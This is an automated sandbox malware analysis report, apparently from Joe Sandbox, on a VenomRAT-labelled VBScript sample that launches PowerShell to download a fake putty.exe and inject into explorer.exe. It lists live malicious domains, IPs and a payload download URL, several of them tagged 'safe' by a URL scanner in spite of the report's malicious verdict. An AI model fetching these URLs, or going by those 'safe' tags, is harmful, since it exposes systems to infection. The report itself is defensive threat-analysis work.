                Source: Yara matchFile source: 00000004.00000003.1568194811.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.1807981755.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1858680191.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 4.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.edrecib.5c0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.putty.exe.600000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.edrecib.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.putty.exe.5f0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.edrecib.5b0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1638027397.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1858830240.0000000000981000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1636745792.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1568194811.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.1807981755.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1858680191.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information211
                Scripting
                Valid Accounts1
                Command and Scripting Interpreter
                211
                Scripting
                312
                Process Injection
                11
                Masquerading
                OS Credential Dumping411
                Security Software Discovery
                Remote Services1
                Archive Collected Data
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Exploitation for Client Execution
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                131
                Virtualization/Sandbox Evasion
                LSASS Memory131
                Virtualization/Sandbox Evasion
                Remote Desktop ProtocolData from Removable Media13
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts3
                PowerShell
                Logon Script (Windows)Logon Script (Windows)312
                Process Injection
                Security Account Manager3
                Process Discovery
                SMB/Windows Admin SharesData from Network Shared Drive4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Hidden Files and Directories
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture124
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                Software Packing
                Cached Domain Credentials113
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578027 Sample: #U041f#U043b#U0430#U0442i#U... Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 33 spotcarservice.ru 2->33 35 restructurisationservice.ru 2->35 37 2 other IPs or domains 2->37 45 Suricata IDS alerts for network traffic 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 5 other signatures 2->51 9 wscript.exe 1 2->9         started        12 edrecib 2->12         started        signatures3 process4 signatures5 61 VBScript performs obfuscated calls to suspicious functions 9->61 63 Suspicious powershell command line found 9->63 65 Wscript starts Powershell (via cmd or directly) 9->65 73 2 other signatures 9->73 14 powershell.exe 14 19 9->14         started        67 Antivirus detection for dropped file 12->67 69 Detected unpacking (changes PE section rights) 12->69 71 Machine Learning detection for dropped file 12->71 75 6 other signatures 12->75 process6 dnsIp7 41 spotcarservice.ru 94.156.177.51, 49706, 49711, 49712 NET1-ASBG Bulgaria 14->41 31 C:\Users\user\AppData\Roaming\putty.exe, PE32 14->31 dropped 43 Powershell drops PE file 14->43 19 putty.exe 14->19         started        22 conhost.exe 14->22         started        file8 signatures9 process10 signatures11 53 Antivirus detection for dropped file 19->53 55 Detected unpacking (changes PE section rights) 19->55 57 Machine Learning detection for dropped file 19->57 59 6 other signatures 19->59 24 explorer.exe 37 2 19->24 injected process12 dnsIp13 39 connecticutproperty.ru 109.70.26.37, 49713, 49826, 49843 RU-CENTERRU Russian Federation 24->39 29 C:\Users\user\AppData\Roaming\edrecib, PE32 24->29 dropped 77 System process connects to network (likely due to code injection or exploit) 24->77 79 Benign windows process drops PE files 24->79 81 Hides that the sample has been downloaded from the Internet (zone.identifier) 24->81 file14 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                #U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs21%ReversingLabsScript-Macro.Trojan.VenomRAT
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\putty.exe100%AviraHEUR/AGEN.1306978
                C:\Users\user\AppData\Roaming\edrecib100%AviraHEUR/AGEN.1306978
                C:\Users\user\AppData\Roaming\putty.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\edrecib100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://spotcarservice.ru/fdjs0%Avira URL Cloudsafe
                https://android.notify.windows.com/iOSA40%Avira URL Cloudsafe
                https://powerpoint.office.comer0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88c0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/pu0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/p0%Avira URL Cloudsafe
                http://constractionscity1991.lat/0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdj0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/putty.0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/putty.ex0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf880%Avira URL Cloudsafe
                http://spotcarservice.ru/f0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjsk0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cv0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/putty.exep0%Avira URL Cloudsafe
                http://spotcarservice.ru/0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/put0%Avira URL Cloudsafe
                https://android.notify.windows.com/iOSd0%Avira URL Cloudsafe
                http://spotcarservice.r0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf0%Avira URL Cloudsafe
                http://connecticutproperty.ru/0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/0%Avira URL Cloudsafe
                http://ns.adobeS0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf80%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumb0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yu0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/putty.exe0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/y0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/putt0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba0%Avira URL Cloudsafe
                https://word.office.com480%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/putty0%Avira URL Cloudsafe
                http://spotcarservice.ru/fd0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/0%Avira URL Cloudsafe
                http://restructurisationservice.ru/0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/putty.e0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yum0%Avira URL Cloudsafe
                http://ccert.coml070%Avira URL Cloudsafe
                http://spotcarservice.ru0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                constractionscity1991.lat
                94.156.177.51
                truefalse
                  high
                  restructurisationservice.ru
                  94.156.177.51
                  truefalse
                    high
                    spotcarservice.ru
                    94.156.177.51
                    truefalse
                      high
                      connecticutproperty.ru
                      109.70.26.37
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://constractionscity1991.lat/true
                        • Avira URL Cloud: safe
                        unknown
                        http://connecticutproperty.ru/true
                        • Avira URL Cloud: safe
                        unknown
                        http://spotcarservice.ru/fdjskf88cvt/yumba/putty.exetrue
                        • Avira URL Cloud: safe
                        unknown
                        http://restructurisationservice.ru/true
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000005.00000000.1622386973.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          https://powerpoint.office.comerexplorer.exe, 00000005.00000000.1624538584.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://android.notify.windows.com/iOSA4explorer.exe, 00000005.00000000.1624538584.000000000BCA8000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://spotcarservice.ru/fdjskf88cpowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              http://spotcarservice.ru/fdjspowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000005.00000000.1622386973.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.1561572514.0000022BE04F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://spotcarservice.ru/fdjskf88cvt/yumba/pupowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      http://spotcarservice.ru/fdjskf88cvt/yumba/putty.expowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://spotcarservice.ru/fdjskf88cvt/yumba/ppowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://spotcarservice.ru/fdjskf88cvt/yumba/putty.powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        https://excel.office.comexplorer.exe, 00000005.00000000.1624538584.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.microexplorer.exe, 00000005.00000000.1621501384.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1619859258.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1621487321.0000000007710000.00000002.00000001.00040000.00000000.sdmpfalse
                                                high
                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  http://spotcarservice.ru/fdjpowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://wns.windows.com/EM0explorer.exe, 00000005.00000000.1624538584.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://spotcarservice.ru/fdjskf88powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      http://spotcarservice.ru/fdjskf88cvtpowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://spotcarservice.ru/fdjskf88cvpowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://spotcarservice.ru/powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://contoso.com/powershell.exe, 00000002.00000002.1561572514.0000022BE04F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1578053595.0000022BEE91C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1561572514.0000022BE04F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://spotcarservice.ru/fdjskpowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.microsoft.cexplorer.exe, 00000005.00000000.1622386973.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1561572514.0000022BDE8B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://android.notify.windows.com/iOSdexplorer.exe, 00000005.00000000.1624538584.000000000BCA8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://spotcarservice.ru/fpowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://spotcarservice.ru/fdjskf88cvt/yumba/putty.exeppowershell.exe, 00000002.00000002.1561572514.0000022BDEAD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://spotcarservice.ru/fdjskf88cvt/yumba/putpowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://spotcarservice.rpowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1578053595.0000022BEE91C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1578053595.0000022BEEACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1561572514.0000022BE04F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://spotcarservice.ru/fdjskfpowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1561572514.0000022BDEAD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1561572514.0000022BDEAD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://go.micropowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://spotcarservice.ru/fdjskf88cvt/ypowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://spotcarservice.ru/fdjskf88cvt/powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://spotcarservice.ru/fdjskf88cvt/yupowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://contoso.com/Iconpowershell.exe, 00000002.00000002.1561572514.0000022BE04F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://spotcarservice.ru/fdjskf8powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://ns.adobeSexplorer.exe, 00000005.00000000.1620332026.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://outlook.comexplorer.exe, 00000005.00000000.1624538584.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://spotcarservice.ru/fdjskf88cvt/yumbpowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://spotcarservice.ru/fdjskf88cvt/yumba/puttpowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1561572514.0000022BDEAD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://spotcarservice.ru/fdjskf88cvt/yumbapowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&ocexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://spotcarservice.ru/fdpowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000005.00000000.1624538584.000000000BCA8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://word.office.com48explorer.exe, 00000005.00000000.1624538584.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://spotcarservice.ru/fdjskf88cvt/yumba/puttypowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000005.00000000.1624538584.000000000BCA8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://spotcarservice.ru/fdjskf88cvt/yumba/powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://api.msn.com/explorer.exe, 00000005.00000000.1620819435.000000000702D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.1561572514.0000022BDE8B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://spotcarservice.ru/fdjskf88cvt/yumba/putty.epowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.msn.com:443/en-us/feedexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://spotcarservice.rupowershell.exe, 00000002.00000002.1561572514.0000022BDEAD3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1561572514.0000022BE04C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1561572514.0000022BE03FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://spotcarservice.ru/fdjskf88cvt/yumpowershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://ccert.coml07explorer.exe, 00000005.00000000.1622386973.000000000926A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.msn.com/en-us/weather/topstories/accuweather-el-niexplorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs
                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    109.70.26.37
                                                                                                                    connecticutproperty.ruRussian Federation
                                                                                                                    48287RU-CENTERRUfalse
                                                                                                                    94.156.177.51
                                                                                                                    constractionscity1991.latBulgaria
                                                                                                                    43561NET1-ASBGfalse
                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1578027
                                                                                                                    Start date and time:2024-12-19 07:51:11 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 7m 14s
